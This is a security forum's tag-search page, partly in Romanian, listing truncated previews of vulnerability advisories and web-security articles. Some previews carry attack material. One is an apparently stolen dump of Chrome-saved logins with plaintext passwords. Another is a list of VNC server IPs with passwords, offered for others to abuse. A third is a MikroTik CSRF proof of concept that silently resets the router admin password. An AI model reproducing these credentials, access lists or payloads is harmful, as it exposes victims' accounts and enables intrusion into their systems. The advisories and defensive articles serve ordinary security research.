Search the Community
Showing results for tags 'application'.
-
android Implementation on an indoo positioning system
ioana.alexandra posted a topic in Mobile security
Am nevoie de o aplicatie pentru Android ce ajuta la localizare,folosindu-se de GPS.Aplicatia este partial facuta. Pentru mai multe informatii astept sa fiu contactata.- 3 replies
-
- 1
-
-
- localizare
- application
- (and 2 more)
-
| # Title : 4images 1.7.11 Multi Vulnerability | # Author : indoushka | # email : indoushka4ever@gmail.com | # Dork : Powered by 4images 1.7.11 | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://www.4homepages.de/ ======================================= Host Header Attack : Vulnerability description : An attacker can manipulate the Host
-
When performing a Web Application Security Assessment, an important step is Fingerprinting which allows for further exploitation by an attacker. So as a security researcher/pentester, we should do well at fingerprinting the web server, which gives lot of information like application name, software version, web server info, OS, and more. This helps for known vulnerabilities, researching vulnerabilities and exploiting. So here I will discuss some techniques which are required for this task: Finger Print Methodology How to perform this activity: obviously for an attacker there is no hard and fast
-
Nektra SpyStudio is an all-in-one tool for cyber security analysts, DevOps, QA engineers, and developers. This multi-tool is useful for application virtualization, troubleshooting Windows applications, application performance monitoring, malware analysis, and as a process monitor complement. Get it now Read more at Nothing found for - | SharewareOnSale
-
In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security. Local Storage Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 by using the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name value pairs. The data processed using the localStorage object persists through browser shut
-
In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to u
-
Defense in depth is dead. The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter. During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,”Pete said. “With apps strewn across the internet, if a corporation thinks they can build perimeter around all their apps then they are nuts.” By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and dev
-
Details ======= Product: F5 BIG-IP Application Security Manager (ASM) Vulnerability: Web Application Firewall Bypass Author: Peter Lapp, lappsec () gmail com CVE: None assigned Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases. Fixed Version: None Summary ======= The F5 ASM is a web application firewall designed to protect web applications from attacks. Due to the way that the system processes JSON content, it's possible to bypass the ASM using a crafted request to a URL that processes both JSON and regular URL encoded requests. The vendor has acknowledged that
-
Application: Google Chrome Host: https://www.dyndn.es/ Username: Fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://www.dropbox.com/de/ Username: fastnet112@googlemail.com Password: Ratte112 Application: Google Chrome Host: http://192.168.100.2...namic_DNS.shtml Username: fastnet@walla.com Password: Ratte113 Application: Google Chrome Host: https://crytecsbs.local/Remote/logon Username: fastnet Password: Ratte112 Application: Google Chrome Host: https://accounts.goo...om/ServiceLogin Username: fastnet112@googlemail.com Password: Melissa78 Application: Google Chrome H
-
Web applications are critical to the enterprise infrastructure. Companies rely on them to communicate with partners, clients, shareholders and others, as well as store corporate information, share files, and conduct a host of other operations. These applications are convenient, as their functionality is dependent upon online browsers. However, web applications may have security weaknesses that can expose a single user or the entire organization to multiple threats. Cyber criminals have been focusing on the web in recent years and the trend continues to grow. Cyber attacks are becoming high-pro
-
GE has released a fix for a vulnerability in a library that’s used in several of its products deployed in critical infrastructure areas. The flaw in the HART Device Type Manager library could allow an attacker to crash affected applications or run arbitrary code. The vulnerability in the DTM library affects four of GE’s products, as well as one product manufactured by MACTek. According to an advisory from ICS-CERT, GE has released an updated library that addresses the problem. “The vulnerability causes a buffer overflow in the HART Device DTM crashing the Field Device Tool (FDT) Frame Applicat
-
Sunt vreo 500 la numar, cred ca gasiti ceva bun p'acolo. Am sa va mai postez, cel putin odata pe saptamana. Hai sariti sa va puneti redirecturile ca stiu ca asta faceti . Ma-ti terorizat cu ele, cum le vad cum le sterg... . 2.109.240.90:5900-null-[None] 112.216.248.234:5900-1-[qq4ero7hd8sv6] 177.21.110.10:5900-1234-[None] 177.21.52.62:5900-123456-[cameras ( 192.168.13.1 ) - application mode] 112.7.121.152:5900-1-[pc-201304141208] 112.16.76.193:5900-null-[installer@installer-desktop] 112.16.93.13:5900-null-[1570020POS99] 112.2.50.149:5900-password-[110301188-01] 112.2.12.21:5900-password-[11
-
Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation Vendor: Safer-Networking Ltd. Product web page: http://www.safer-networking.org Affected version: 1.6.2 Summary: Spybot – Search & Destroy (S&D) is a spyware and adware removal computer program compatible with Microsoft Windows 95 and later. It scans the computer hard disk and/or RAM for malicious software. Desc: The application suffers from an unquoted search path issue impacting the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D. This could potentially allow an authorized but n
-
Security researchers at IBM have uncovered a bug in cloud storage service provider Dropbox's software development kit (SDK) that potentially leaves millions of Android users open to attack. Researchers at IBM's X-Force Application Security Research warned that the 'DroppedIn' flaw affects many applications using the Dropbox SDK. "It allows attackers to connect applications on mobile devices to a Dropbox account they control," explained vice president of IBM Security Caleb Barlow. "This vulnerability may affect any Android app that uses the Dropbox SDK versions 1.5.4 to 1.6.1, and can be exploi
-
Threat Level: High Severity: High CVSS Severity score: 7.0 Impact: Complete Integrity, Confidentiality, and Availability violation. EBay Reference: #EIBBP-31480 Vulnerability: (1) Unauthenticated Cross-Site Scripting Vulnerability (1) Filtration Bypass Vendor Overview “eBay Inc. is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and
-
1 Introduction The Dropbox SDK is a library that developers can download and add to their products. This library provides easy access to Dropbox features, such as downloading and uploading files, via a simple set of APIs. AppBrain provides statistics as to the prevalence of the use of the Dropbox SDK on Android [1]. According to these statistics, 0.31% of all applications use the Dropbox SDK. Of the top 500 apps in the Google Play Store, 1.41% use the Dropbox SDK. Interestingly, 1.32% of total app installations and 3.93% of app installations of the top 500 apps use the Dropbox SDK, respectivel
-
MikroTik RouterOS < v5.0 Admin Password Change CSRF Vulnerability by @SymbianSyMoh</b></h1></br> <input type="submit" value="Do it" onclick="var btn=document.createElement('IFRAME');btn.src=' [url]http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned[/url]') <http://s.bl-1.com/h/mPQQyg5?url=http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&passwo
-
In the first part of this series, we covered the Top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them. Protect Data and Privacy It helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details etc. should be stored in encrypted or hashed format inside a database or chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely differe
-
What is OWASP ProActive Controls? In one line, this project can be explained as “Secure Coding Practices by Developers for Developers“. OWASP ProActive Controls is a document prepared for developers who are developing or are new to developing software/application with secure software development. This OWASP project lists 10 controls that can help a developer implement secure coding and better security inside the application while it is being developed. Following these secure application development controls ensures that the key areas of the development cycle have secure coding along with trad
-
Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for
-
M-am gandit sa mai ofer si eu ceva comunitati,ca tot am cerut pana acum
-
With this utility you can compare two PE-module files (exe,dll,...). Pediff.dll uses levenshtein distance algorithm to find identical and/or similar functions in two binaries. There's an option to import .map file for first binary and remap it correctly to second module. External text differ application can be easily integrated. Archive includes c++ source code - class which allows you to write your own . Download: Zippyshare.com
-
( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Kaseya Browser Android Path Traversal Affected Versions: Kaseya Browser 7.0 Android PDF: http://www.security-assessment.com/files/documents/advisory/Kaseya_Browser_Android_Path_Traversal.pd
-
XSS or Cross Site Scripting is a web application vulnerability that occurs when untrusted data from the user is processed by the web application without validation and is reflected back to the browser without encoding or escaping, resulting in code execution at the browser engine. type of XSS Reflected or Non-Persistent XSS ? Stored or Persistent XSS ? DOM based XSS ? mXSS or Mutation XSS Read more: http://dl.packetstormsecurity.net/papers/general/ultimate-xss.pdf
-
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tam
